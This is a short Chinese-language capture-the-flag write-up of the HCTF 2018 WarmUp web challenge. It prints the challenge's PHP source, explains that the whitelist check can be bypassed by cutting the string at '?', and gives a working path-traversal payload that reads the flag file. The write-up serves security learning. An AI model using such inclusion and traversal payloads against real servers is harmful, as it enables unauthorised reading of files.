BUUCTF [HCTF 2018] WarmUp
2020-02-07 14:00
501 查看
开局一张图 直接查看源码
发现注释source.php
访问获得源码
<?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"];if (! isset($page) || !is_string($page)) { echo "you can't see it"; return false; } if (in_array($page, $whitelist)) { return true; } $_page = mb_substr( $page, 0, mb_strpos($page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } $_page = urldecode($page); $_page = mb_substr( $_page, 0, mb_strpos($_page . '?','?') ); if (in_array($_page, $whitelist)) { return true; } echo "you can't see it"; return false; } } if (! empty($_REQUEST['file']) && is_string($_REQUEST['file']) && emmm::checkFile($_REQUEST['file']) ) { include $_REQUEST['file']; exit; } else { echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />"; } ?>
看见还有一个hint.php 访问
flag not here, and flag in ffffllllaaaagggg
看样子 应该flag应该就是在ffffllllaaaagggg里面了
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];
$_page = mb_substr( $page, 0, mb_strpos($page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; }
发现只有source.php,hint.php能访问
$_page截取到page从零到问号的字符串
所以我们构造source.php?..或者hint.php?..即可绕过检测
最后REQUEST利用…/…/跳转目录读取flag
最终payload
file=hint.php?/../../../../../../../../ffffllllaaaagggg
访问获得flag
- 点赞 1
- 收藏
- 分享
- 文章举报
相关文章推荐
- buuoj--[HCTF 2018]WarmUp
- Nuit du Hack CTF Quals 2018 writeup (web)
- 蓝鲸ctf 逆向0x1 Warmup
- 0ctf-pwn_warmup-re_mips4
- HCTF_2018-Writeup【web题】
- 2018~第三届南宁市网络安全技术大赛~nnctf~write-up
- HITCTF 2018 wp [我真是菜鸟]
- hgame-2018 CTFwp(杭电信安)week1
- hgame-2018 CTFwp(杭电信安)week2
- 2018中原工CTF校赛
- RE-picoCTF2018-be-quick-or-be-dead-2
- BUUCTF [SUCTF 2019]EasySQL
- hgame-2018 CTFwp(杭电信安)week3
- 初试ctf wp
- 2018,送给大家一份提升技术的宝典
- 如何评价2018字节跳动(今日头条)ACM-ICPC冬令营?
- ZOJ Monthly, January 2018
- 【NIPS2018】Text-Adaptive Generative Adversarial Networks: Manipulating Images with Natural Language
- 任泽平:95页PPT分析2018(经济、房价、政策)
- 计蒜客2018 蓝桥杯省赛 B 组模拟赛(三)回文子串